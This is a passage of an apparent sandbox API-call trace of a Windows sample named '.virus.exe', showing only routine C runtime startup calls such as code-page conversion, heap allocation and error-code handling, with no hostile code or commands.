!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¶\x04£\x91\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0056.634] GetLastError () returned 0x0 [0056.634] SetLastError (dwErrCode=0x0) [0056.634] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0056.634] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ돏\䃚) returned 256 [0056.634] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ돏\䃚, cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0056.634] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ돏\䃚, cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0056.634] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¶\x04£\x91\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0056.635] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x439300, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\d609a21245d77dccd6d4a659cbd9466a.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\d609a21245d77dccd6d4a659cbd9466a.virus.exe")) returned 0x45 [0056.635] GetLastError () returned 0x0 [0056.635] SetLastError (dwErrCode=0x0) [0056.635] GetLastError () returned 0x0 [0056.635] SetLastError (dwErrCode=0x0) [0056.635] GetLastError () returned 0x0 [0056.635] SetLastError (dwErrCode=0x0) [0056.635] GetLastError () returned 0x0 [0056.635] SetLastError (dwErrCode=0x0) [0056.635] GetLastError () returned 0x0 [0056.635] SetLastError (dwErrCode=0x0) [0056.635] GetLastError () returned 0x0 [0056.635] SetLastError (dwErrCode=0x0) [0056.635] GetLastError () returned 0x0 [0056.635] SetLastError (dwErrCode=0x0) [0056.635] GetLastError () returned 0x0 [0056.635] SetLastError (dwErrCode=0x0) [0056.635] GetLastError () returned 0x0 [0056.635] SetLastError (dwErrCode=0x0) [0056.636] GetLastError () returned 0x0 [0056.636] SetLastError (dwErrCode=0x0) [0056.636] GetLastError () returned 0x0 [0056.636] SetLastError (dwErrCode=0x0) [0056.636] GetLastError () returned 0x0 [0056.636] SetLastError (dwErrCode=0x0) [0056.636] GetLastError () returned 0x0 [0056.636] SetLastError (dwErrCode=0x0) [0056.636] GetLastError () returned 0x0 [0056.636] SetLastError (dwErrCode=0x0) [0056.636] GetLastError () returned 0x0 [0056.636] SetLastError (dwErrCode=0x0) [0056.636] GetLastError () returned 0x0 [0056.636] SetLastError (dwErrCode=0x0) [0056.636] GetLastError () returned 0x0 [0056.636] SetLastError (dwErrCode=0x0) [0056.636] GetLastError () returned 0x0 [0056.636] SetLastError (dwErrCode=0x0) [0056.636] GetLastError () returned 0x0 [0056.636] SetLastError (dwErrCode=0x0) [0056.636] GetLastError () returned 0x0 [0056.637] SetLastError (dwErrCode=0x0) [0056.637] GetLastError () returned 0x0 [0056.637] SetLastError (dwErrCode=0x0) [0056.637] GetLastError () returned 0x0 [0056.637] SetLastError (dwErrCode=0x0) [0056.637] GetLastError () returned 0x0 [0056.637] SetLastError (dwErrCode=0x0) [0056.637] GetLastError () returned 0x0 [0056.637] SetLastError (dwErrCode=0x0) [0056.637] GetLastError () returned 0x0 [0056.637] SetLastError (dwErrCode=0x0) [0056.637] GetLastError () returned 0x0 [0056.637] SetLastError (dwErrCode=0x0) [0056.637] GetLastError () returned 0x0 [0056.637] SetLastError (dwErrCode=0x0) [0056.637] GetLastError () returned 0x0 [0056.637] SetLastError (dwErrCode=0x0) [0056.637] GetLastError () returned 0x0 [0056.637] SetLastError (dwErrCode=0x0) [0056.638] GetLastError () returned 0x0 [0056.638] SetLastError (dwErrCode=0x0) [0056.638] GetLastError () returned 0x0 [0056.638] SetLastError (dwErrCode=0x0) [0056.638] GetLastError () returned 0x0 [0056.638] SetLastError (dwErrCode=0x0) [0056.638] GetLastError () returned 0x0 [0056.638] SetLastError (dwErrCode=0x0) [0056.638] GetLastError () returned 0x0 [0056.638] SetLastError (dwErrCode=0x0) [0056.638] GetLastError () returned 0x0 [0056.638] SetLastError (dwErrCode=0x0) [0056.638] GetLastError () returned 0x0 [0056.638] SetLastError (dwErrCode=0x0) [0056.638] GetLastError () returned 0x0 [0056.638] SetLastError (dwErrCode=0x0) [0056.638] GetLastError () returned 0x0 [0056.638] SetLastError (dwErrCode=0x0) [0056.638] GetLastError () returned 0x0 [0056.639] SetLastError (dwErrCode=0x0) [0056.639] GetLastError () returned 0x0 [0056.639] SetLastError (dwErrCode=0x0) [0056.639] GetLastError () returned 0x0 [0056.639] SetLastError (dwErrCode=0x0) [0056.639] GetLastError () returned 0x0 [0056.639] SetLastError (dwErrCode=0x0) [0056.639] GetLastError () returned 0x0 [0056.639] SetLastError (dwErrCode=0x0) [0056.639] GetLastError () returned 0x0 [0056.639] SetLastError (dwErrCode=0x0) [0056.639] GetLastError () returned 0x0 [0056.639] SetLastError (dwErrCode=0x0) [0056.639] GetLastError () returned 0x0 [0056.639] SetLastError (dwErrCode=0x0) [0056.639] GetLastError () returned 0x0 [0056.640] SetLastError (dwErrCode=0x0) [0056.640] GetLastError () returned 0x0 [0056.640] SetLastError (dwErrCode=0x0) [0056.640] GetLastError () returned 0x0 [0056.640] SetLastError (dwErrCode=0x0) [0056.640] GetLastError () returned 0x0 [0056.640] SetLastError (dwErrCode=0x0) [0056.640] GetLastError () returned 0x0 [0056.640] SetLastError (dwErrCode=0x0) [0056.641] GetLastError () returned 0x0 [0056.641] SetLastError (dwErrCode=0x0) [0056.641] GetLastError () returned 0x0 [0056.641] SetLastError (dwErrCode=0x0) [0056.641] GetLastError () returned 0x0 [0056.641] SetLastError (dwErrCode=0x0) [0056.641] GetLastError () returned 0x0 [0056.641] SetLastError (dwErrCode=0x0) [0056.641] GetLastError () returned 0x0 [0056.641] SetLastError (dwErrCode=0x0) [0056.641] GetLastError () returned 0x0 [0056.641] SetLastError (dwErrCode=0x0) [0056.641] GetLastError () returned 0x0 [0056.641] SetLastError (dwErrCode=0x0) [0056.641] GetLastError () returned 0x0 [0056.641] SetLastError (dwErrCode=0x0) [0056.641] GetLastError () returned 0x0 [0056.641] SetLastError (dwErrCode=0x0) [0056.641] GetLastError () returned 0x0 [0056.642] SetLastError (dwErrCode=0x0) [0056.642] GetLastError () returned 0x0 [0056.642] SetLastError (dwErrCode=0x0) [0056.642] GetLastError () returned 0x0 [0056.642] SetLastError (dwErrCode=0x0) [0056.642] GetLastError () returned 0x0 [0056.642] SetLastError (dwErrCode=0x0) [0056.642] GetLastError () returned 0x0 [0056.642] SetLastError (dwErrCode=0x0) [0056.642] GetLastError () returned 0x0 [0056.642] SetLastError (dwErrCode=0x0) [0056.642] GetLastError () returned 0x0 [0056.642] SetLastError (dwErrCode=0x0) [0056.642] GetLastError () returned 0x0 [0056.642] SetLastError (dwErrCode=0x0) [0056.642] GetLastError () returned 0x0 [0056.642] SetLastError (dwErrCode=0x0) [0056.642] GetLastError () returned 0x0 [0056.642] SetLastError (dwErrCode=0x0) [0056.642] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x4e) returned 0x2f19b0 [0056.642] GetLastError () returned 0x0 [0056.643] SetLastError (dwErrCode=0x0) [0056.643] GetLastError () returned 0x0 [0056.643] SetLastError (dwErrCode=0x0) [0056.643] GetLastError () returned 0x0 [0056.643] SetLastError (dwErrCode=0x0) [0056.643] GetLastError () returned 0x0 [0056.643] SetLastError (dwErrCode=0x0) [0056.643] GetLastError () returned 0x0 [0056.643] SetLastError (dwErrCode=0x0) [0056.643] GetLastError () returned 0x0 [0056.643] SetLastError (dwErrCode=0x0) [0056.643] GetLastError () returned 0x0 [0056.643] SetLastError (dwErrCode=0x0) [0056.643] GetLastError () returned 0x0 [0056.643] SetLastError (dwErrCode=0x0) [0056.643] GetLastError () returned 0x0 [0056.643] SetLastError (dwErrCode=0x0) [0056.643] GetLastError () returned 0x0 [0056.643] SetLastError (dwErrCode=0x0) [0056.643] GetLastError () returned 0x0 [0056.644] SetLastError (dwErrCode=0x0) [0056.644] GetLastError () returned 0x0 [0056.644] SetLastError (dwErrCode=0x0) [0056.644] GetLastError () returned 0x0 [0056.644] SetLastError (dwErrCode=0x0) [0056.644] GetLastError () returned 0x0 [0056.644] SetLastError (dwErrCode=0x0) [0056.644] GetLastError () returned 0x0 [0056.644] SetLastError (dwErrCode=0x0) [0056.644] GetLastError () returned 0x0 [0056.644] SetLastError (dwErrCode=0x0) [0056.644] GetLastError () returned 0x0 [0056.644] SetLastError (dwErrCode=0x0) [0056.644] GetLastError () returned 0x0 [0056.644] SetLastError (dwErrCode=0x0) [0056.644] GetLastError () returned 0x0 [0056.644] SetLastError (dwErrCode=0x0) [0056.644] GetLastError () returned 0x0 [0056.644] SetLastError (dwErrCode=0x0) [0056.644] GetLastError () returned 0x0 [0056.645] SetLastError (dwErrCode=0x0) [0056.645] GetLastError () returned 0x0 [0056.645] SetLastError (dwErrCode=0x0) [0056.645] GetLastError () returned 0x0 [0056.645] SetLastError (dwErrCode=0x0) [0056.645] GetLastError () returned 0x0 [0056.645] SetLastError (dwErrCode=0x0) [0056.645] GetLastError () returned 0x0 [0056.645] SetLastError (dwErrCode=0x0) [0056.645] GetLastError () returned 0x0 [0056.645] SetLastError (dwErrCode=0x0) [0056.645] GetLastError () returned 0x0 [0056.645] SetLastError (dwErrCode=0x0) [0056.645] GetLastError () returned 0x0 [0056.645] SetLastError (dwErrCode=0x0) [0056.645] GetLastError () returned 0x0 [0056.645] SetLastError (dwErrCode=0x0) [0056.645] GetLastError () returned 0x0 [0056.645] SetLastError (dwErrCode=0x0) [0056.645] GetLastError () returned 0x0 [0056.646] SetLastError (dwErrCode=0x0) [0056.646] GetLastError () returned 0x0 [0056.646] SetLastError (dwErrCode=0x0) [0056.646] GetLastError () returned 0x0 [0056.646] SetLastError (dwErrCode=0x0) [0056.646] GetLastError () returned 0x0 [0056.646] SetLastError (dwErrCode=0x0) [0056.646] GetLastError () returned 0x0 [0056.646] SetLastError (dwErrCode=0x0) [0056.646] GetLastError () returned 0x0 [0056.646] SetLastError (dwErrCode=0x0) [0056.646] GetLastError () returned 0x0 [0056.646] SetLastError (dwErrCode=0x0) [0056.646] GetLastError () returned 0x0 [0056.646] SetLastError (dwErrCode=0x0) [0056.646] GetLastError () returned 0x0 [0056.646] SetLastError (dwErrCode=0x0) [0056.646] GetLastError () returned 0x0 [0056.646] SetLastError (dwErrCode=0x0) [0056.646] GetLastError () returned 0x0 [0056.647] SetLastError (dwErrCode=0x0) [0056.647] GetLastError () returned 0x0 [0056.647] SetLastError (dwErrCode=0x0) [0056.647] GetLastError () returned 0x0 [0056.647] SetLastError (dwErrCode=0x0) [0056.647] GetLastError () returned 0x0 [0056.647] SetLastError (dwErrCode=0x0) [0056.647] GetLastError () returned 0x0 [0056.647] SetLastError (dwErrCode=0x0) [0056.647] GetLastError () returned 0x0 [0056.647] SetLastError (dwErrCode=0x0) [0056.647] GetLastError () returned 0x0 [0056.647] SetLastError (dwErrCode=0x0) [0056.647] GetLastError () returned 0x0 [0056.647] SetLastError (dwErrCode=0x0) [0056.647] GetLastError () returned 0x0 [0056.647] SetLastError (dwErrCode=0x0) [0056.647] GetLastError () returned 0x0 [0056.647] SetLastError (dwErrCode=0x0) [0056.647] GetLastError () returned 0x0 [0056.648] SetLastError (dwErrCode=0x0) [0056.648] GetLastError () returned 0x0 [0056.648] SetLastError (dwErrCode=0x0) [0056.648] GetLastError () returned 0x0 [0056.648] SetLastError (dwErrCode=0x0) [0056.648] GetLastError () returned 0x0 [0056.648] SetLastError (dwErrCode=0x0) [0056.648] GetLastError () returned 0x0 [0056.648] SetLastError (dwErrCode=0x0) [0056.648] GetLastError () returned 0x0 [0056.648] SetLastError (dwErrCode=0x0) [0056.648] GetLastError () returned 0x0 [0056.648] SetLastError (dwErrCode=0x0) [0056.648] GetLastError () returned 0x0 [0056.648] SetLastError (dwErrCode=0x0) [0056.648] GetLastError () returned 0x0 [0056.648] SetLastError (dwErrCode=0x0) [0056.648] GetLastError () returned 0x0 [0056.648] SetLastError (dwErrCode=0x0) [0056.648] GetLastError () returned 0x0 [0056.648] SetLastError (dwErrCode=0x0) [0056.648] GetLastError () returned 0x0 [0056.649] SetLastError (dwErrCode=0x0) [0056.649] GetLastError () returned 0x0 [0056.649] SetLastError (dwErrCode=0x0) [0056.649] GetLastError () returned 0x0 [0056.649] SetLastError (dwErrCode=0x0) [0056.649] GetLastError () returned 0x0 [0056.649] SetLastError (dwErrCode=0x0) [0056.649] GetLastError () returned 0x0 [0056.649] SetLastError (dwErrCode=0x0) [0056.649] GetLastError () returned 0x0 [0056.649] SetLastError (dwErrCode=0x0) [0056.649] GetLastError () returned 0x0 [0056.649] SetLastError (dwErrCode=0x0) [0056.649] GetLastError () returned 0x0 [0056.649] SetLastError (dwErrCode=0x0) [0056.649] GetLastError () returned 0x0 [0056.649] SetLastError (dwErrCode=0x0) [0056.649] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x98) returned 0x2f1a08 [0056.649] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x1f) returned 0x2f1aa8 [0056.649] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x2b) returned 0x2f1ad0 [0056.649] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x37) returned 0x2f1b08 [0056.649] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x3c) returned 0x2f1b48 [0056.649] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x31) returned 0x2f1b90 [0056.650] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x18) returned 0x2f1bd0 [0056.650] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x24) returned 0x2f1bf0 [0056.650] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x14) returned 0x2f1c20 [0056.650] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xd) returned 0x2f1c40 [0056.650] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x1a) returned 0x2f1c58 [0056.650] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x2e) returned 0x2f1c80 [0056.650] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x19) returned 0x2f1cb8 [0056.650] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x17) returned 0x2f1ce0 [0056.650] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xe) returned 0x2f1d00 [0056.650] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x95) returned 0x2f1d18 [0056.650] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x3e) returned 0x2f1db8 [0056.650] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x1b) returned 0x2f1e00 [0056.650] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x1d) returned 0x2f1e28 [0056.650] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x48) returned 0x2f1e50 [0056.650] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x12) returned 0x2f1ea0 [0056.650] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x18) returned 0x2f1ec0 [0056.650] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x1b) returned 0x2f1ee0 [0056.650] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x24) returned 0x2f1f08 [0056.650] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x29) returned 0x2f1f38 [0056.650] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x1e) returned 0x2f1f70 [0056.650] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x6b) returned 0x2f1f98 [0056.650] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x17) returned 0x2f2010 [0056.650] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xf) returned 0x2f2030 [0056.650] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x16) returned 0x2f2048 [0056.650] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x2a) returned 0x2f2068 [0056.650] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x29) returned 0x2f20a0 [0056.650] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x16) returned 0x2f20d8 [0056.650] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x13) returned 0x2f20f8 [0056.651] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x1f) returned 0x2f2118 [0056.651] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x12) returned 0x2f2140 [0056.651] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x18) returned 0x2f2160 [0056.651] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x46) returned 0x2f2180 [0056.653] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2f11f8 | out: hHeap=0x2f0000) returned 1 [0056.653] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x769b0000 [0056.653] GetProcAddress (hModule=0x769b0000, lpProcName="IsProcessorFeaturePresent") returned 0x769c51ed [0056.653] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0056.654] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x800) returned 0x2f21d0 [0056.654] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x80) returned 0x2f11f8 [0056.655] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4080d0) returned 0x0 [0056.655] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f11f8) returned 0x80 [0056.656] GetLastError () returned 0x0 [0056.656] SetLastError (dwErrCode=0x0) [0056.656] GetLastError () returned 0x0 [0056.656] SetLastError (dwErrCode=0x0) [0056.656] GetLastError () returned 0x0 [0056.656] SetLastError (dwErrCode=0x0) [0056.656] GetLastError () returned 0x0 [0056.656] SetLastError (dwErrCode=0x0) [0056.656] GetLastError () returned 0x0 [0056.656] SetLastError (dwErrCode=0x0) [0056.656] GetLastError () returned 0x0 [0056.656] SetLastError (dwErrCode=0x0) [0056.656] GetLastError () returned 0x0 [0056.656] SetLastError (dwErrCode=0x0) [0056.656] GetLastError () returned 0x0 [0056.656] SetLastError (dwErrCode=0x0) [0056.656] GetLastError () returned 0x0 [0056.657] SetLastError (dwErrCode=0x0) [0056.657] GetLastError () returned 0x0 [0056.657] SetLastError (dwErrCode=0x0) [0056.657] GetLastError () returned 0x0 [0056.657] SetLastError (dwErrCode=0x0) [0056.657] GetLastError () returned 0x0 [0056.657] SetLastError (dwErrCode=0x0) [0056.657] GetLastError () returned 0x0 [0056.657] SetLastError (dwErrCode=0x0) [0056.657] GetLastError () returned 0x0 [0056.657] SetLastError (dwErrCode=0x0) [0056.657] GetLastError () returned 0x0 [0056.657] SetLastError (dwErrCode=0x0) [0056.657] GetLastError () returned 0x0 [0056.657] SetLastError (dwErrCode=0x0) [0056.657] GetLastError () returned 0x0 [0056.657] SetLastError (dwErrCode=0x0) [0056.657] GetLastError () returned 0x0 [0056.657] SetLastError (dwErrCode=0x0) [0056.657] GetLastError () returned 0x0 [0056.658] SetLastError (dwErrCode=0x0) [0056.658] GetLastError () returned 0x0 [0056.658] SetLastError (dwErrCode=0x0) [0056.658] GetLastError () returned 0x0 [0056.658] SetLastError (dwErrCode=0x0) [0056.658] GetLastError () returned 0x0 [0056.658] SetLastError (dwErrCode=0x0) [0056.658] GetLastError () returned 0x0 [0056.658] SetLastError (dwErrCode=0x0) [0056.658] GetLastError () returned 0x0 [0056.658] SetLastError (dwErrCode=0x0) [0056.658] GetLastError () returned 0x0 [0056.658] SetLastError (dwErrCode=0x0) [0056.658] GetLastError () returned 0x0 [0056.658] SetLastError (dwErrCode=0x0) [0056.658] GetLastError () returned 0x0 [0056.658] SetLastError (dwErrCode=0x0) [0056.658] GetLastError () returned 0x0 [0056.659] SetLastError (dwErrCode=0x0) [0056.659] GetLastError () returned 0x0 [0056.659] SetLastError (dwErrCode=0x0) [0056.659] GetLastError () returned 0x0 [0056.659] SetLastError (dwErrCode=0x0) [0056.659] GetLastError () returned 0x0 [0056.659] SetLastError (dwErrCode=0x0) [0056.659] GetLastError () returned 0x0 [0056.659] SetLastError (dwErrCode=0x0) [0056.659] GetLastError () returned 0x0 [0056.659] SetLastError (dwErrCode=0x0) [0056.659] GetLastError () returned 0x0 [0056.659] SetLastError (dwErrCode=0x0) [0056.659] GetLastError () returned 0x0 [0056.659] SetLastError (dwErrCode=0x0) [0056.659] GetLastError () returned 0x0 [0056.659] SetLastError (dwErrCode=0x0) [0056.659] GetLastError () returned 0x0 [0056.659] SetLastError (dwErrCode=0x0) [0056.659] GetLastError () returned 0x0 [0056.660] SetLastError (dwErrCode=0x0) [0056.660] GetLastError () returned 0x0 [0056.660] SetLastError (dwErrCode=0x0) [0056.660] GetLastError () returned 0x0 [0056.660] SetLastError (dwErrCode=0x0) [0056.660] GetLastError () returned 0x0 [0056.660] SetLastError (dwErrCode=0x0) [0056.660] GetLastError () returned 0x0 [0056.660] SetLastError (dwErrCode=0x0) [0056.660] GetLastError () returned 0x0 [0056.660] SetLastError (dwErrCode=0x0) [0056.660] GetLastError () returned 0x0 [0056.660] SetLastError (dwErrCode=0x0) [0056.660] GetLastError () returned 0x0 [0056.660] SetLastError 